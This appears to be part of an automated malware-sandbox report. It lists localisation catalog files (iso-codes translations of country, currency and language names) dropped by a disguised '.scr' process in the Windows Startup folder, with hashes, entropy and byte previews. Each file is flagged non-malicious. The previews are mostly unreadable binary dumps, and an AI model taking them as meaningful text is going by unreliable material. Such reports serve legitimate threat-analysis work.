                                                                                                    Preview:........................\-.................................................................................%.......*.......2.......7.......@.......E.......M.......m.......s.......|...................................................................................................................................).......6.......;.......J.......Q.......f.......l.......|......................................................................................................................................+...........K.......P.......c.......j.......w.......}...................................................................................................&.......1.......F.......R.......^.......j.......x...........................................................................................&.......3.......=.......I.......X.......`.......j.......t.......}...........................................................................................%.......3.......C.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britisches Antarktis-Territorium'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2815
                                                                                                    Entropy (8bit):5.222471948127772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3g/YlSJe2/J+vGqIfdvqN5CoU1ySgtOMrkgrK0Q9:rLvDC+yaCoE92OMrkgK9
                                                                                                    MD5:E635636FBB13E30F40CD99E4793F336B
                                                                                                    SHA1:CA1E59A2B01B0CF6DE5A94C23D3B7044515753CD
                                                                                                    SHA-256:44EA7D672CAB689B332DA5F1CBA4E82528F587631301E0C553D629CDC5AFAEDE
                                                                                                    SHA-512:D3D11C1D6456547AD663F79D9D0E54509AD45C7693E519B48257335891F4571049BF399AEB54E3A637E5D7C2C2DE85BFD044072E7ED9907788628A115BD79A4F
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+....................... .......(.......,...........9...=...V...........................................(...................6.......Q......._.......l...................".......................................&.......1...(.......Z.......n...........(.......2....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB-Einheit eines Kontos'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9904
                                                                                                    Entropy (8bit):5.004375632396056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFQZkF66VRyK0G/2LCntxv36I8FmVEEdJ7batp:SiZc66TL0G/Uo/vq/QVRd5baj
                                                                                                    MD5:CF63B965745477D0722FE650DB621F69
                                                                                                    SHA1:B9571B6F23687470004BD3FFD5C088CA3D5E0E31
                                                                                                    SHA-256:F9636F14115D73F179DAC8B81AD5442DCF78A5743083555E93C1FA562E7E95CC
                                                                                                    SHA-512:FF50BD1749EAB1FCA7DB6E5F2359533AA9E80D31686B1E0B9768C26541F71D57C7F97B95F246372FC78DDAEE3F3E609EDAD93774FB71D39B3C9E4149CD917F0E
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8919 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):395660
                                                                                                    Entropy (8bit):5.298981484395671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:uxCisBLwfVOG6A6+s2LVzawTsOSGWJ1DghdaPpilWxyiGDezu9XqUFa23:cPdfSA6uy3TDghgBMWeIaE23
                                                                                                    MD5:F1414518DEE0BC102EF933C9B9A27150
                                                                                                    SHA1:85F01D4D60C37D15AEE064FF3BB92EBF19F206F1
                                                                                                    SHA-256:60264F64CDDDB98AC5883BEDE6EBE9DA6632F7BE49760914F6E6F4B278130F4B
                                                                                                    SHA-512:2C11855F8AF48453CB30AC298DA65E22C4D11CF26EAAD75D8AB3808090E86CA53034D760BC2B8B67EFA0837A7B9F65A7E3EF55C9AC92A0ADD199C532080F6292
                                                                                                    Malicious:false
                                                                                                    Preview:........."..........y....-......p.......q.......z...............................................................................................................................................................&.......+.......0.......6.......:.......G.......L.......Q.......V.......\.......d.......i.......z...............................................................................................................................................&...............4.......;.......A.......H.......L.......[.......e.......u...............................................................................................................................................$.......,.......4.......:.......H.......N.......S.......Y.......`.......d.......i.......n.......................................................................................2.......=.......D.......M.......S.......a.......k.......u.......|...............................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afro-Asiatische Sprachen'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7860
                                                                                                    Entropy (8bit):4.8990660435071725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2LJkVfRSlSE0BfCuXr5VcJHVCeARVoX6zRgGcGdZfEgDmrBen5v33:4SDxt2iSE0BfNcaeARzL533
                                                                                                    MD5:E964EFA504DF88D91091FFF8026FE545
                                                                                                    SHA1:78C55380498DDD566A9961322BFE7803D4642E70
                                                                                                    SHA-256:ACC27A07862DF2BB5B78BBD66B0F937036CEC5FF2081FCAD7E540E2A5294F239
                                                                                                    SHA-512:7971F31950AD466995FBE014561407206C539DC9935B50881DCFFD8F349B4964BD6001F5557C40530B95E2D7CCE5368DBD1DD3CE9ABA21067E0EF79E3AF18CFE
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 203 messages, Project-Id-Version: iso_3166-1 '\336\207\336\246\336\212\336\260\336\243\336\247\336\202\336\250\336\220\336\260\336\214\336\247\336\202\336\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11257
                                                                                                    Entropy (8bit):4.923690401799442
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Z6/0WD6cPFZBEVXq+vCrTe8zugykLD7xnfwVvohx2pKVAq:o/LPFZe1LCrqcugykLDN7oKVAq
                                                                                                    MD5:5BF64E5C11ED000501FD47F059978568
                                                                                                    SHA1:72802DE702098A19DEE8ED897BF21112C7E1EF57
                                                                                                    SHA-256:5C3B282BF5BA93F53DE82702E586AE054DA903D90C3854F9732565E9A47B8362
                                                                                                    SHA-512:EC6EC71630A527A12E7AE4EB2262CD011374665402FEB7D5EABEA673ED7AD98C0C869EB8EC575D969D19728C928EF11AA7DC38AB7957229E2DA77C0514975ADE
                                                                                                    Malicious:false
                                                                                                    Preview:................t...............................................%.......4.......<.......C.......L.......`.......j.......r.......x.......................................................................................................................................#.......,.......9.......A.......J.......S.......Z.......i...............................................................................................................................................+.......3.......<.......J.......i.......n.......v.......}............................................................................................................................................... .......).......3.......;.......C.......I.......S.......X.......`.......l.......s.......y...............................................................................................................................................................".......'.......-.......8.......C.......M.......T.......\.......c.......l.......w.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 397 messages, Project-Id-Version: iso_3166-1 '\340\275\250\340\275\225\340\274\213\340\275\202\340\274\213\340\275\223\340\275\262\340\275\246\340\275\262\340\274\213\340\275\217\340\275\261\340\275\223\340\274\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40229
                                                                                                    Entropy (8bit):4.82790178229774
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:m5MRo5AivwlXmsOP4XJOAjy/cJq6EBKqtRsYYDvwJsG9xexp3PhLl2hUg:LMEshPJxxSW
                                                                                                    MD5:C9DCFCB40C4AD2D726FA67C8DDAEA51A
                                                                                                    SHA1:89C2687613D29DE2CB1B1218C4435CE7E3C472A0
                                                                                                    SHA-256:B95E2F72CCB47BE7BCF9C0B99F79BB75095EDFDC794C728E72E5FBC9B750AF58
                                                                                                    SHA-512:B4695D77C74A0CDE5E8D5B0FBF4A5C37781D20A220D87C58B6BA3878A8D5E215DDEF00960CFC7E106AE4230F3627CE71156EABCBB8F0CC0FD58D80C954251268
                                                                                                    Malicious:false
                                                                                                    Preview:................................`!......a!......m!......u!......}!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......""......*"......2"......="......F"......N"......V"......]"......c"......k".. ...r".......".......".......".......".......".......".......".......#......&#......8#......A#......N#......V#......_#......h#......o#......~#.......#.......#.......#.......#.......#.......#.......#.......#..,....$......<$......D$..%...J$......p$......}$.......$.......$.......$.......$.......$..%....$..,....$.."....%..*...0%......[%......c%......l%......u%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&..'....&..$...;&......`&......|&.......&.......&.......&.......&.......&.......&.......&.......'.......'......4'......:'......L'......S'......['......c'......i'......s'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'..!....(......)(......;(......Y(......b(..0...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\275\226\340\275\262\340\275\242\340\275\262\340\274\213\340\275\212\340\275\262\340\275\244\340\274\213 \340\275\250\340\275\272\340\275\223\340\274\213\340\275\212\340\275\200\340\274\213\340\275\212\340\275\262\340\275\200\340\274\213 \340\275\246\340\274\213\340\275\201\340\275\274\340\275\204\340\275\246\340\274\215(\340\275\225\340\276\261\340\275\262\340\274\213\340\275\202\340\276\263\340\275\262\340\275\204\340\275\224\340\274\213\340\275\221\340\275\204\340\274\213\340\275\242\340'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4758
                                                                                                    Entropy (8bit):4.979432804091915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADtZfOvGqIfdvqNuoURL+9txYnwHRG+yeRW7dYUQMQ4DAze+UW+CZmakM3wHpFq:qDtoyBoIL+9Vxt87GTz+CZJkMAHO
                                                                                                    MD5:06268BD328DE4946808058D74630B672
                                                                                                    SHA1:33F9371C09705BBD7DF516841A4332CF9F6D7BEA
                                                                                                    SHA-256:92805893547069B200387378DD8C3171FAE560C094135F51E60615011C2DBA3D
                                                                                                    SHA-512:F9BC90D426F1D829BBC08F04F3E12A391143A4D664395DB47F5693AFC8F529F6A0E8DD1186F5FFF7CC2B7AE3D6D1D819F55F4D9CC3BA724D465ED693A79C1A25
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c......................._.......Q...........j.......................9.......1...2...F...d...L.......w.......X...p...d.......C.......:...r...O.......0.......7.......}...f...8.......S...........q...C.......u...........A...D.......a...2...*...............7...^........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):522
                                                                                                    Entropy (8bit):5.283229655734183
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4h1xxLtt02Ukl//xtLLR/4FEesXmBQWiOWRl:Rhnjt0UNp/osXmGRl
                                                                                                    MD5:03B5D626C7246A6BC9C3BEB05C52455E
                                                                                                    SHA1:2D85895CB7E18507FD5D101EB1B410FC629A05FD
                                                                                                    SHA-256:C849C373A127EEE069EF2E173C67AB8DF4C449B4CC747229FAE939FD941FB964
                                                                                                    SHA-512:5C2351B7F6CB38FC3FD3EC1CAC0AF4A29861EB2E0FEB27A50F9A58AAA75FE0FF08ADC15E1B2A122EAA80812B60131DC6EE68DAE3BE598D25E8DD04D9A92254F3
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 05:28+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Ewe <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ee/>.Language: ee.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 27 messages, Project-Id-Version: iso_15924 '\316\221\317\201\316\261\316\262\316\271\316\272\316\254'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1864
                                                                                                    Entropy (8bit):5.3415452209353935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:HChxQb7NAPj/N/jqj/JalcA6T/d/0VLMFCVt0Uoy9YNk/QXmGJu8RgC/dHflr11i:iHQb7NAjdY/BFJ4MFlUVCkJjytrG
                                                                                                    MD5:00A0F578F8909ECD85986B433BC4F9BC
                                                                                                    SHA1:1D2A957F2F5FAB1D24103E678822B9571C3AE476
                                                                                                    SHA-256:93DA44CB2BB54DB43331BC1F5BF9EFAB7ECFF06545DE72EFD66C60C46D26D912
                                                                                                    SHA-512:CFC3B13D12DE8143E3E250F7BC18B5CF104A1C238F70EFC3963DC71AB690975271A8D1689D3FB3A041FE70B8914FB501588508C83393DFE5171448E6B008BAE3
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......h.......q.......y.......................................................................................................................................).......3.......>.......E.......K.......P.......X.......*.......9.......J.......].......j.......y...................%.......+................... ......./.......@.......W...+...f....................................................................... .......5........................................................................................................................................................Arabic.Armenian.Bengali.Braille.Coptic.Cypriot.Cyrillic.Egyptian demotic.Egyptian hieratic.Egyptian hieroglyphs.Elbasan.Gothic.Greek.Gujarati.Hebrew.Imperial Aramaic.Latin.Linear A.Linear B.Malayalam.Mongolian.Phoenician.Syriac.Tamil.Thai.Tibetan.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2019-06-18 19:05+
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\316\221\317\206\316\263\316\261\316\275\316\271\317\203\317\204\316\254\316\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30772
                                                                                                    Entropy (8bit):5.266627697298047
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZgdMVIxT+AItmsWP4XdAIn+owosbwAPITDFmEITvrjGgu:LnSYAow+fcAR
                                                                                                    MD5:41D188EB7608303E6AE40B08AED97C82
                                                                                                    SHA1:4BEE1DD8BBEA0EA48E6D48F5EA4B0B84D84FF347
                                                                                                    SHA-256:F018EA325E3FF6912A505D1B5E8545AAFA443852C0CE74F285AF47605D3F70D0
                                                                                                    SHA-512:7582BE45F472CAE341D3BDFA6CDD595961DDDCB0843C493D5D08C02AE7A030F32A3D8D6B7C8EE2642899CAD22A2B4DF5B1813F3A8479B7480E184717457D4EF5
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 173 messages, Project-Id-Version: iso_3166-2 '\316\221\316\273\316\261\316\274\317\200\316\254\316\274\316\261'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9264
                                                                                                    Entropy (8bit):5.130597997018435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:2GKqXBSfftRurvFkEXKgjRz7TVf/Bi36FtgAGWs4O0mSYY9h3Xj2F:xXR+FR0vR6gjdy36oBJ4uSYYz3XS
                                                                                                    MD5:662885A55033271F17C913AF48C1408B
                                                                                                    SHA1:A8B2646EDC7879E14DA3AFB791D6E25E45746B3A
                                                                                                    SHA-256:DCF21E87A31109D1B400BFF454DD74FE993BBA1B78C81F553A6FCF5CEAC9CE22
                                                                                                    SHA-512:1AD1E11F4A44C8D01E6E6171C637AB0FD1E8BB53073529E301F5EBFB37A29D889DF6CB285CB7DC711F0A67E597C0A6E8466A4C9D4149F433E9CD2CCAC778F1A7
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................%...............7.......H.......O.......X.......a.......i.......q.......x.......................................................................................................................................$.......).......1.......9.......@.......H.......U.......`.......e.......o.......w.......~...............................................................................................................................................................$.......-.......<.......C.......M.......Y.......b.......i.......m.......u...............................................................................................................................%.......>.......Q.......g.......{.......................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\316\225\316\264\316\254\317\206\316\277\317\202 \317\204\316\267\317\202 \316\222\317\201\316\265\317\204\316\261\316\275\316\271\316\272\316\256\317\202 \316\221\316\275\317\204\316\261\317\201\316\272\317\204\316\271\316\272\316\256\317\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3428
                                                                                                    Entropy (8bit):5.520022640040408
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD9k0gpzvGqIfdvqNuoUZ8kyMgm+r7We89SQXHgE6q/fvy:qDetpzyBosyuU77Wt6q/i
                                                                                                    MD5:6DCEE26E03A1F0628723844E0B64F27D
                                                                                                    SHA1:C8CE0F229E5BB807DA35075958A0192BE984285F
                                                                                                    SHA-256:F8443650B075CC3CFFFAAF04FD1A1EC8D103BA5247D250E244F83FBA40692825
                                                                                                    SHA-512:AB403A996711493D84593078BC2263E4EDD592CB840A1F2933B57A7342C636EDE81604693026DAC79B5F6CBBD9824D68DF5F4B625F0D20EF9D3287EE77424DF5
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................?.......Z.......^.......3...{...f...............+...'.......S...(...q...).......@.......9......./...?.......o...........%.......................D.......-...F...*...t...................R.......[...........s...6...............L.......%...>........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 151 messages, Project-Id-Version: iso_4217 '\316\233\316\277\316\263\316\271\317\203\317\204\316\271\316\272\316\256 \316\274\316\277\316\275\316\254\316\264\316\261 ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9431
                                                                                                    Entropy (8bit):5.188318771426307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1SaYC6DJVay5MX/WBeBoESu2r+Ah3k+cJQJ6Z26PVbt:1SUyMX+BWoE92TQyJ6xPpt
                                                                                                    MD5:AC4474A740E5719E45EA27CCC83C506C
                                                                                                    SHA1:9F92FCCE962B7EB2C95CAAF0BB3F5DDCA4C8557E
                                                                                                    SHA-256:870BA2CD2FE0A735ECD7B2D1D0A0E0EC30970A102AC5BA3438F888E38C8EA0DC
                                                                                                    SHA-512:A4E10DBB42304DB8DADA55A6FF6881D1C3093C321662F6DF509E56250451FC1AFC0B1C42DC90E690C1246C1F1448A290B9393CF0EC690C2ECFC4570CBAE10635
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................!......./.......A.......Q.......`.......e.......l.......|...............................................................................................(.......>.......K.......Z.......j.......v...............................................................................................................)...............E.......Q.......X.......c.......s.......x.......................................................................................................................*.......1.......6.......;.......J.......N.......V.......\.......l.......y.......................................................................................................!.......4.......F.......Y.......b.......s.......................................................................................................................................!.......(.......6.......C.......V.......b.......p.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 830 messages, Project-Id-Version: iso_639-3 '\316\221\316\274\317\200\316\261\317\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57390
                                                                                                    Entropy (8bit):5.295858961553772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:GhF+nAGiI+e6obcRd0fQsf6GLR2ArjjkFM1I+CNqbfXFU:GhF+/+VoQRa99LRbfjuM14NqbfXFU
                                                                                                    MD5:493D1F518495D3600EFEE81359F6EAA7
                                                                                                    SHA1:57CD0E8B018878768CEA7CFD5629327783AED464
                                                                                                    SHA-256:03BF330AD07E28080671CFC8FD4C25CD0EB010CBA6897337F257BAF03759FC05
                                                                                                    SHA-512:F16EA9D387BC7C386DB272F169A7C5A30C1A13270E98625702E8A948BEDEBFCE58408C9720E643959B824795E24ECEA0B104226B2B87F3570B894BC93205FFCE
                                                                                                    Malicious:false
                                                                                                    Preview:........>...........U....3......PE......QE......VE......\E......cE......gE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F......+F......AF......VF......eF......tF.......F.......F.......F.......F.......F.......F.."....F.......G......1G......8G......IG......bG......uG.......G.......G.......G.......G.......G.......G.......G.......H.......H......-H......IH......^H......mH.......H.......H.......H.......H.......H.......H.......H.......I.......I......)I......:I......PI......_I......pI.......I.......I.......I.......I.......I.......I.......I.......J......!J......3J......8J......>J......RJ......gJ..#...pJ.......J.......J.......J.......J.......J.......J.......J.......K.......K......'K......<K......DK......[K......bK......jK......oK......uK......}K.......K.......K.......K.......K.......K.......K.......K.......K.......L.......L......!L......(L......>L......HL......`L......qL.......L.......L.......L.......L.......L.......L.......L.......L......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 24 messages, Project-Id-Version: iso_639-5 '\316\221\317\206\317\201\316\277-\316\261\317\203\316\271\316\261\317\204\316\271\316\272\316\255\317\202 \316\263\316\273\317\216\317\203\317\203\316\265\317\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2391
                                                                                                    Entropy (8bit):5.386980140199228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:+drO06P5w0CUWksxG5eAwTwvA5Qs5uwh5Mrxl5oouw1FqDxZ522gN3:+drO0S57Cksxq5w0vYQsV/MtbooV1FAA
                                                                                                    MD5:3ABA2D02163E1E06FD4A3CB4335083F4
                                                                                                    SHA1:33D2E98D754F23EC5F793D26A6425307D00F561F
                                                                                                    SHA-256:ECA6AA02A0D60D082DA6A3C804461F376367FB8A0BF7AE754698EF585C341161
                                                                                                    SHA-512:8CB114ED0B3CB8A68DF17F809F5649473EA476338B5C8A20B87711D08729A8DD7DEF6F09561C31C09DC697EE488E7896285FB5B6189E5157A3341BA6064794E0
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........0.......1.......H.......Y.......n...........................................!...........................1.......D.......T.......l.......~...........................................................*...................)...!...I...)...k...+...............!...............G...#...#...k...+.......#...............,...........*...C...J...........'.......!.......,...........!.......A........................................................................................................................................................Afro-Asiatic languages.Altaic languages.Artificial languages.Athapascan languages.Australian languages.Austronesian languages.Baltic languages.Caucasian languages.Celtic languages.Central American Indian languages.Cushitic languages.Finno-Ugrian languages.Germanic languages.Indic languages.Indo-European languages.Iranian languages.North American Indian languages.Papuan languages.Romance languages.Semitic languages.Sino-Tibetan language
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2202 messages, Project-Id-Version: iso_3166-2 'A'ana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90768
                                                                                                    Entropy (8bit):5.032211538377605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:GCvRrba4/8NHz+lzuX+0X0hT+Dn0JWh6No+Ilwy8hCeRZIlI:GC5q0zI+0C6ZhOo+IlshbRZIlI
                                                                                                    MD5:C8C50EED5140810058D7E085175A19E9
                                                                                                    SHA1:EEA78612365231E7631B8C85326A2A07AEB5E500
                                                                                                    SHA-256:F2E63759A47259F0DC8007ED5233FDCA12C378EFBAFF3607B61B01CD89DC6727
                                                                                                    SHA-512:D696F51FEAB58558922F752A1595252738D7383447667D4D1B199B2DBCFB870728E64B59AA7AF097DE7D355D2E3B08C71CFAFFDC9EAD391929423617479E03EC
                                                                                                    Malicious:false
                                                                                                    Preview:.................D..{....................................................................................................................................%......./.......>.......O.......^.......c.......i.......w.......}..................................................................................................................................................".......,.......4.......<.......E.......L.......Q.......Z.......`.......h.......t.......z...........................................................................................................................%.......A.......P.......X.......i.......s.......y.......................................................................................................................... .......%.......,.......4.......;.......B.......J.......S.......\.......e.......l.......|.........................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 163 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8524
                                                                                                    Entropy (8bit):4.928580422696669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fkK9YJz2mZtITzbk4jXj+Sa5hW8nGkVe0y:fl9WIvY4zjZa5hW8nGkI
                                                                                                    MD5:DE469946511A52688FB4ACAC0D5C82B1
                                                                                                    SHA1:036A722F1184E62D684C6B624977869EACA9DF2F
                                                                                                    SHA-256:39E759DD3EDFF7BB59F0B30CA6D121FD5B9ADD568065845A3824E6D29DE265C9
                                                                                                    SHA-512:0DC0FCB9F38647E294CE20B7FE8136464838F841C70574A087E49F14060AD29A63FE535E0DEB59C56DE750F653A234833062C89A8AB4C81A8FCA3AEB8017FFBC
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L...................?...................................'.......0.......6.......@.......F.......N.......Z.......g.......p.......w......................................................................................................./.......6.......Q.......Y...&...b...................(...................................................).......>.......I.......P.......X.......^.......g.......p...............................................................................2.......I...4...x...................................................................................#...........-.......M.......T.......X.......^.......v.......................................................................................................................-.......L.......].......r...........(...............................-...................................!...#...'.......K..."...k...)...................................................................................(.......3.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afganio'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23042
                                                                                                    Entropy (8bit):5.019011868801421
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bReOXlbXDEe2m33zmwZbjh5wsWP4XWAIziUG2zZ1QH4ZPe:sxI0bl22zmotmsWP4XWAI9zZ1QH4ZG
                                                                                                    MD5:0A61767256D6CEAB64397E67ADBF08A5
                                                                                                    SHA1:973D1C4489036E9EFF4258485DD011D508FD2C7C
                                                                                                    SHA-256:76BD359C2F051148068D909D38CCD76E6EF1B7C5BFE2AE0D8E4A0359A55C024B
                                                                                                    SHA-512:238B09F2C8D407496E0E863EFC40D9A39C711EEC7FC7BDDBD96F544F2B47F6174C0F249F645D4D92C0C01ABACAFA90FE5F57331DE9F8A3EBED4E8FAB84D72D3F
                                                                                                    Malicious:false
